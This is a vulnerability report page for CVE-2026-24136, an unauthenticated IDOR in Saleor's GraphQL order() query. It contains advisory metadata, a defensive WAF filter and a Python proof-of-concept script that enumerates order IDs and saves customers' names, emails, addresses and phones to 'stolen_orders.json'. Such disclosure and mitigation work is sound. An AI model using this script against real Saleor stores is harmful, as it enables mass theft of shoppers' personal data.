Security Vulnerability Report
CVE-2026-24136 CVSS 7.5 HIGH

CVE-2026-24136

Published: 2026-01-24 00:15:49
Last Modified: 2026-02-12 16:15:01

Description

Saleor is an e-commerce platform. Versions 3.2.0 through 3.20.109, 3.21.0-a.0 through 3.21.44 and 3.22.0-a.0 through 3.22.28 have an Insecure Direct Object Reference (IDOR) vulnerability that allows unauthenticated actors to extract sensitive information in plain text. Orders created before Saleor 3.2.0 could have PII exfiltrated. The issue has been patched in Saleor versions 3.22.29, 3.21.45 and 3.20.110. As a workaround, temporarily block non-staff users from fetching order information (the order() GraphQL query) using a WAF.
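The workaround above (block the order() query for non-staff clients at a WAF) can be expressed as a request filter that inspects the GraphQL document rather than matching a substring. This is an added example, not Saleor's code or part of the original report; the X-Verified-Staff header check is an assumption standing in for whatever the deployment's auth layer actually provides, and all request bodies used with it are constructed.

```python
import json
import re

# Root fields the advisory says to block for non-staff clients while unpatched.
BLOCKED_ROOT_FIELDS = {"order"}

def is_staff(headers: dict) -> bool:
    # ASSUMPTION: an auth proxy sets this header only for verified staff sessions
    # and strips any client-supplied copy of it before the request reaches here.
    return headers.get("X-Verified-Staff", "").lower() == "true"

def _selections(text: str) -> set[str]:
    """Field names in one flattened selection set, aliases resolved."""
    text = re.sub(r"\.\.\.\s*(?:on\s+\w+|\w+)", " ", text)  # fragment spreads
    text = re.sub(r"@\w+", " ", text)                        # directives
    return {m.group(2) for m in re.finditer(r"(?:(\w+)\s*:\s*)?(\w+)", text)}

def root_fields(document: str) -> set[str]:
    """Root fields selected by every operation in a GraphQL document."""
    doc = re.sub(r'"(?:\\.|[^"\\])*"', '""', document)  # blank string literals
    doc = re.sub(r"#[^\n]*", "", doc)                    # drop comments
    doc = re.sub(r"\([^()]*\)", "", doc)                 # drop argument lists
    fields, depth, in_op, prefix, buf = set(), 0, True, [], []
    for ch in doc:
        if ch == "{":
            depth += 1
            if depth == 1:  # new top-level block: operation or fragment?
                in_op = not "".join(prefix).strip().startswith("fragment")
                prefix, buf = [], []
        elif ch == "}":
            depth -= 1
            if depth == 0 and in_op:
                fields |= _selections("".join(buf))
        elif depth == 0:
            prefix.append(ch)  # operation keyword, name, variables
        elif depth == 1:
            buf.append(ch)     # root selection set (nested sets are skipped)
    return fields

def should_block(raw_body: str, headers: dict) -> bool:
    """WAF-style decision for POST /graphql/: True means reject the request."""
    if is_staff(headers):
        return False
    try:
        body = json.loads(raw_body)
    except ValueError:
        return True  # unparseable body at the GraphQL endpoint: fail closed
    items = body if isinstance(body, list) else [body]  # batched queries too
    return any(root_fields(i.get("query") or "") & BLOCKED_ROOT_FIELDS
               for i in items if isinstance(i, dict))
```

Aliases, variables, batched documents and fragment definitions are handled so that a client cannot slip the order query past a naive pattern match; nested selections are deliberately ignored because only the root order() query is named in the advisory.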

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Weakness
CWE-639 (Authorization Bypass Through User-Controlled Key)

Configurations (Affected Products)

cpe:2.3:a:saleor:saleor:*:*:*:*:*:*:*:* - Saleor 3.2.0 through 3.20.109 - VULNERABLE
cpe:2.3:a:saleor:saleor:*:*:*:*:*:*:*:* - Saleor 3.21.0-a.0 through 3.21.44 - VULNERABLE
cpe:2.3:a:saleor:saleor:*:*:*:*:*:*:*:* - Saleor 3.22.0-a.0 through 3.22.28 - VULNERABLE

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-24136 PoC - Saleor IDOR exploitation
# An attacker can enumerate order IDs to retrieve any user's order information
import requests
import json

TARGET_URL = "https://target-saleor-instance/graphql/"


def exploit_idor(target_url, order_id):
    """
    Exploit the Saleor IDOR to retrieve sensitive information for a given order.

    Args:
        target_url: Saleor GraphQL API endpoint
        order_id: target order ID

    Returns:
        sensitive order information (JSON)
    """
    # Build the GraphQL query, passing an arbitrary order ID straight in
    query = '''
    query {
      order(id: "%s") {
        id
        number
        status
        user { email firstName lastName }
        billingAddress {
          firstName lastName streetAddress1 streetAddress2
          city postalCode country { country } phone
        }
        shippingAddress {
          firstName lastName streetAddress1 streetAddress2
          city postalCode country { country } phone
        }
        lines {
          productName variantName quantity
          unitPrice { amount currency }
        }
        total { amount currency }
      }
    }
    ''' % order_id
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0",
    }
    response = requests.post(
        target_url,
        json={"query": query},
        headers=headers,
        timeout=10,
    )
    return response.json()


def mass_exploit(target_url, start_id, end_id):
    """
    Bulk exploitation: iterate over a range of order IDs and collect user data.
    """
    results = []
    for order_id in range(start_id, end_id + 1):
        try:
            data = exploit_idor(target_url, f"Order-{order_id}")
            if "errors" not in data and data.get("data", {}).get("order"):
                order_info = data["data"]["order"]
                results.append(order_info)
                print(f"[+] Retrieved order {order_id}")
        except Exception as e:
            print(f"[-] Failed to retrieve order {order_id}: {e}")
    # Save the collected data
    with open("stolen_orders.json", "w") as f:
        json.dump(results, f, indent=2, ensure_ascii=False)
    return results


# Example usage
if __name__ == "__main__":
    # Single-order test
    result = exploit_idor(TARGET_URL, "Order-1001")
    print(json.dumps(result, indent=2, ensure_ascii=False))

References

https://github.com/saleor/saleor/commit/5dab1857fbb2801f74e2bfe86f307e4590d9d2fa (Patch)
https://github.com/saleor/saleor/commit/718ce1b4fc3aef68eeac1aea0cf1d70a614ba6af (Patch)
https://github.com/saleor/saleor/commit/9bcd4f9000b189297eeb3ac88cc28c6c30229153 (Patch)
https://github.com/saleor/saleor/commit/aeaced8acb5e01055eddec584263f77e517d5944 (Patch)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24136", "sourceIdentifier": "[email protected]", "published": "2026-01-24T00:15:49.167", "lastModified": "2026-02-12T16:15:00.550", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Saleor is an e-commerce platform. Versions 3.2.0 through 3.20.109, 3.21.0-a.0 through 3.21.44 and 3.22.0-a.0 through 3.22.28 have a n Insecure Direct Object Reference (IDOR) vulnerability that allows unauthenticated actors to extract sensitive information in plain text. Orders created before Saleor 3.2.0 could have PIIs exfiltrated. The issue has been patched in Saleor versions: 3.22.29, 3.21.45, and 3.20.110. To workaround, temporarily block non-staff users from fetching order information (the order() GraphQL query) using a WAF."}, {"lang": "es", "value": "Saleor es una plataforma de comercio electrónico. Las versiones 3.2.0 a 3.20.109, 3.21.0-a.0 a 3.21.44 y 3.22.0-a.0 a 3.22.28 tienen una vulnerabilidad de Referencia Directa Insegura a Objeto (IDOR) que permite a actores no autenticados extraer información sensible en texto plano. Los pedidos creados antes de Saleor 3.2.0 podrían haber tenido PIIs exfiltrados. El problema ha sido parcheado en las versiones de Saleor: 3.22.29, 3.21.45 y 3.20.110. 
Como solución alternativa, bloquee temporalmente a los usuarios que no son personal de obtener información de pedidos (la consulta GraphQL order()) usando un WAF."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", 
"privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:saleor:saleor:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.2.0", "versionEndExcluding": "3.20.110", "matchCriteriaId": "1D519693-9F38-49CC-A2AA-7A707AE921C4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:saleor:saleor:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.21.0", "versionEndExcluding": "3.21.45", "matchCriteriaId": "CD9EA08A-C411-4D72-B4DB-27FAC65202A6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:saleor:saleor:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.22.0", "versionEndExcluding": "3.22.29", "matchCriteriaId": "72EB08B2-3E6B-40B7-AFE2-783A7FDDFAA3"}]}]}], "references": [{"url": "https://github.com/saleor/saleor/commit/5dab1857fbb2801f74e2bfe86f307e4590d9d2fa", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/saleor/saleor/commit/718ce1b4fc3aef68eeac1aea0cf1d70a614ba6af", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/saleor/saleor/commit/9bcd4f9000b189297eeb3ac88cc28c6c30229153", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/saleor/saleor/commit/aeaced8acb5e01055eddec584263f77e517d5944", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/saleor/saleor/security/a ... (truncated)